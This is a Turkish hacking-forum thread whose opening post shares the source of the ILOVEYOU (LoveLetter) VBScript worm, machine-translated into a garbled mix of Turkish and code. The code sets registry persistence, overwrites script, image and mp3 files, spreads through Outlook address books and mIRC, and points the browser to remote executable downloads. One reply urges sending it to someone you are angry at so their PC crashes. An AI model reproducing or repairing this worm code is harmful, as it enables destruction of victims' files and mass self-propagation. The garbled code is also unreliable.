İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

ı love you<<<vırus

30-01-2011 21:22
#1
yilmaz43 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2010
Mesajlar:
53
Teşekkür (Etti):
2
Teşekkür (Aldı):
4
Konular:
34
Ticaret:
(0) %
Kod kaynağı virüs "Seni seviyorum"


Eğer yastık notu veya kopya içine bir not defteri ve dosya exe ismi
O zaman biliyorum gönderir o virüsün en yıkıcı öyle biri.

Kodu:

barok rem-loveletter (vbe) <i school> gitmek için nefret
değiştirilmiştir: Skinner / jp@fbi.gov / Grup /???/?? / www.Radiohacktive.tk
Hata da İleri'yi Resume
Güneş fso, dirsystem, dirwin, dirtemp, eq, ctr, dosya, vbscopy, d

ow
EQ = ""
ctr = 0
Set fso = CreateObject ("Scripting.FileSystemObject")
set file = fso.OpenTextFile (WScript.ScriptFullname, 1)
vbscopy = file.ReadAll

REM main () CSS ': Ana ReMed dışarı aşılama sağlayın daha eskimiş bitmişler vardır-. unREM çalıştırmak için.

Sub Main ()
Hata da İleri'yi Resume
Güneş WSCR, rr
Set WSCR = CreateObject ("WScript.Shell")
wscr.RegRead rr = ("HKEY_CURRENT_USER \ Software \ Microsoft \ Windows Scripting Host \ Settings \ Timeout")
if (rr> = 1) sonra
wscr.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows Scripting Host \ Settings \ Timeout", 0, "REG_DWORD"
sonunda eğer

Set dirwin fso.GetSpecialFolder = (0)
Set dirsystem fso.GetSpecialFolder = (1)
Set dirtemp fso.GetSpecialFolder = (2)
Set c = fso.GetFile (WScript.ScriptFullName)
c.Copy (dirsystem & "\ MSKernel32.vbs)
c.Copy (dirwin & "\ Win32DLL.vbs)
c.Copy (dirsystem & "\ LOVE-LETTER-FOR-YOU.TXT.vbs)

RegRun ()
html ()
REM spreadtoemail () CSS ': Worm Nedenleri Itself yayılması. Ilaçlar için aşılama fazla bile.
listadriv ()
sonunda alt

RegRun sub ()
Hata da İleri'yi Resume
Güneş num, downread
Curr regcreate "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \

entVersion \ Run \ MSKernel32 "dirsystem &" \ MSKernel32.vbs "
Curr regcreate "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \

entVersion \ RunServices \ Win32DLL "dirwin &" \ Win32DLL.vbs "
downread = ""
downread regget = ("HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Download Directory")
o zaman eğer downread (= "")
downread = "c: \"
sonunda eğer

if (FileExists (dirsystem & "\ WinFAT32.exe") = 1) sonra
Rasgele seçmek
num = Int ((4 * Rnd) + 1)
sonra num = 1 ise
HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf regcreate "HKCU \ Software \ Microsoft \ Internet Explorer \ Main \ Start Page", "http://www.skyinet.net/ young1s ~ /

"7679njbvYT/WIN-BUGSFIX.exe
elseif num = 2 sonra
skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j regcreate "HKCU \ Software \ Microsoft \ Internet Explorer \ Main \ Start Page", "http://www.skyinet.net/ angelcat ~ /

"NHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
elseif num = sonra 3
"Regcreate" HKCU \ Software \ Microsoft \ Internet Explorer \ Main \ Start Page, "http://www.skyinet.net/ ~ Koichi / jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V

BVG / WIN-BUGSFIX.exe "
elseif num = sonra 4
sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras regcreate "HKCU \ Software \ Microsoft \ Internet Explorer \ Main \ Start Page", "http://www.skyinet.net/ ~ chu /

djhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy

"7thjg/WIN-BUGSFIX.exe
sonunda eğer
sonunda eğer

Daha sonra if (FileExists downread (& "\ WIN-BUGSFIX.exe") = 0)
Curr regcreate "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \

entVersion \ Run \ BUGSFIX WIN-"downread &" \ WIN-BUGSFIX.exe "
"Microsoft \ Internet Explorer \ Main \ Start Page", "about: blank \ regcreate \" HKEY_CURRENT_USER Software
sonunda eğer
sonunda alt

Alt listadriv
Hata da İleri'yi Resume
Dim DC, s
Set dc = fso.Drives
Için dc Her d
d.DriveType ise = 2 veya 3 = Sonra d.DriveType
folderlist (d.path & "\")
sonunda eğer
Sonraki
listadriv = s
sonunda alt

Alt infectfiles (folderspec)
Hata da İleri'yi Resume
Güneş f, f1, fc, ext, ap, mircfname, s, bname, mp3
Set f = fso.GetFolder (folderspec)
Set fc = f.Files

fc f1 Her için
ext = fso.GetExtensionName (f1.path)
ext = LCase (dahili)
s = LCase (f1.name)

Daha sonra if (ext = "vbs") veya (ext = "vbe")
set ap = fso.OpenTextFile (true f1.path, 2)
vbscopy ap.write
ap.close
elseif (ext = "js") veya (ext = "jse") veya (ext = "css") veya (ext = "wsh") veya (ext = "sct") veya (ext = "hta") sonra
set ap = fso.OpenTextFile (true f1.path, 2)
vbscopy ap.write
ap.close
bname = fso.GetBaseName (f1.path)
set polis = fso.GetFile (f1.path)
cop.copy (folderspec & "\" & bname & ". vbs")
) Fso.DeleteFile (f1.path
elseif (ext = "jpg") veya (ext "=" jpeg) sonra
set ap = fso.OpenTextFile (true f1.path, 2)
vbscopy ap.write
ap.close
set polis = fso.GetFile (f1.path)
cop.copy (& f1.path. "vbs")
) Fso.DeleteFile (f1.path
elseif (ext = "mp3") veya dahili = "mp2") sonra (
Set mp3 = fso.CreateTextFile (f1.path & ". Vbs")
vbscopy mp3.write
mp3.close
set att = fso.GetFile (f1.path)
att.attributes att.attributes = 2
sonunda eğer

if (EQ <> folderspec) sonra
ya da, eğer (s = "mirc32.exe") (s = "mlink32.exe") ya da (s = "mirc.ini") ya da (s = "script.ini") ya da (s = "mirc.hlp) sonra
Set scriptin fso.CreateTextFile = (& folderspec "\ script.ini")
"Scriptini.WriteLine" [script]
scriptini.WriteLine "mIRC Script
scriptini.WriteLine "olacak mIRC eğer script mIRC ... Will bozuk, bu düzenleyin dont"
"Scriptini.WriteLine bozuk ... WINDOWS Will Etkiler" koşmak değil mi ve doğru. Teşekkür
scriptini.WriteLine ";"
scriptini.WriteLine "Khaled Mardam-Bey"
scriptini.WriteLine "http://www.mirc.com/"
scriptini.WriteLine ";"
:#:{" = JOIN 1: n0 scriptini.WriteLine "
scriptini.WriteLine "n1 = /} if ($ nick == $ me) {halt"
scriptini.WriteLine "n2 = /. $ nick dcc göndermek" & dirsystem & "\ LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3 =}"
scriptini.close
eq = folderspec
sonunda eğer
sonunda eğer
sonraki
sonunda alt

Alt folderlist (folderspec)
Hata da İleri'yi Resume
Güneş f, f1, sf
Set f = fso.GetFolder (folderspec)
Set sf = f.SubFolders

sf f1 Her için
infectfiles (f1.path)
folderlist (f1.path)
sonraki

sonunda alt

Alt regcreate (regkey, regValue)
Set regedit = CreateObject ("WScript.Shell")
regValue regedit.RegWrite Regkey,
sonunda alt

regget fonksiyonu (değer)
Set regedit = CreateObject ("WScript.Shell")
regget regedit.RegRead = (değer)
sonunda fonksiyon

fonksiyon FileExists (dosyabelirtimi)

Hata da İleri'yi Resume
Güneş msj
if (fso.FileExists (dosyabelirtimi)) Sonra
msg = 0
başka
msg = 1
sonunda eğer

FileExists = msg
sonunda fonksiyon

folderexist fonksiyonu (folderspec)
Hata da İleri'yi Resume
Güneş msj
if (fso.GetFolderExists (folderspec)) sonra
msg = 0
başka
msg = 1
sonunda eğer
FileExists = msg
sonunda fonksiyon


Alt spreadtoemail ()
Hata da İleri'yi Resume
Güneş X, A, ctrlists, ctrentries, malead, b, regedit Regv, rega

d
Set regedit = CreateObject ("WScript.Shell")
Set out = WScript.CreateObject ("Outlook.Application")
Set Mapi = out.GetNameSpace ("MAPI")
= 1 ila ctrlists mapi.AddressLists.Count
Set a = mapi.AddressLists (ctrlists)
x = 1
Regv regedit.RegRead = ("HKEY_CURRENT_USER \ Software \ Microsoft \ WAB \" & a)
Daha sonra if (Regv = "")
Regv = 1
sonunda eğer

if (int (a.AddressEntries.Count)> int (Regv)) sonra
= 1 ila ctrentries a.AddressEntries.Count
malead a.AddressEntries = (x)
Regad = ""
Regad) regedit.RegRead = ("HKEY_CURRENT_USER \ Software \ Microsoft \ WAB \" & malead
Daha sonra if (Regad = "")
set erkek = out.CreateItem (0)
) Male.Recipients.Add (malead
male.Subject = "SENI SEVIYORUM"
male.Body = vbCrLf & "nazikçe" Bana Loveletter gelmesini Ekli kontrol edin. "
male.Attachments.Add (dirsystem & "\ LOVE-LETTER-FOR-YOU.TXT.vbs)
male.Send
regedit.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ WAB \" & malead, 1, "REG_DWORD"
sonunda eğer
x = x 1
sonraki
regedit.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ WAB \" & a, a.AddressEntries.Count
başka
regedit.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ WAB \" & a, a.AddressEntries.Count
sonunda eğer
sonraki
Set out = Nothing
Set Mapi = Nothing
sonunda alt
Kullanıcı İmzası
Tüm insanlar ancak Allah'ın köleleridir !

30-01-2011 21:53
#2
Üyelik tarihi:
01/2011
Mesajlar:
20
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
3
Ticaret:
(0) %
google çeivir berbat ayrıca denemeyin denerseniz sanal pc ile deneyin
30-01-2011 21:59
#3
turqud - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2008
Yaş:
28
Mesajlar:
2.433
Teşekkür (Etti):
183
Teşekkür (Aldı):
359
Konular:
606
Ticaret:
(0) %
kardesim bu virusu defalarca verildi
30-01-2011 22:36
#4
yilmaz43 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2010
Mesajlar:
53
Teşekkür (Etti):
2
Teşekkür (Aldı):
4
Konular:
34
Ticaret:
(0) %
Gormedim ben boyle internete interesant bilgileri de paylasirim kimseyede zorla bise yapmalarini istemiyon bi bilgiyi paylasdim ne yapiyorlarsa yapsinlar.
Kullanıcı İmzası
Tüm insanlar ancak Allah'ın köleleridir !
31-01-2011 20:30
#5
Se-ZeR - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
07/2008
Nereden:
İstanbul
Mesajlar:
10.915
Teşekkür (Etti):
1198
Teşekkür (Aldı):
7712
Konular:
2878
Ticaret:
(0) %
Alıntı:
2pacvsbiggie´isimli üyeden Alıntı Mesajı göster
google çeivir berbat ayrıca denemeyin denerseniz sanal pc ile deneyin
Anlamadım Şimdi, Adam Sana Diyor Ki Tehlikeli Bu Virüs Kızdığın Birine Yolla, Pc Çöker, Sen Tutmuş Denemeyin Diyorsun.
Garipsin...
Kullanıcı İmzası
Düşman edinmek istiyorsan bir şeyi değiştirmeyi dene.


Sıkça Sorulan Sorular (Lütfen Pm Atmadan Önce Bir Bakın)


~Twitter~
~Feysbuk~

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı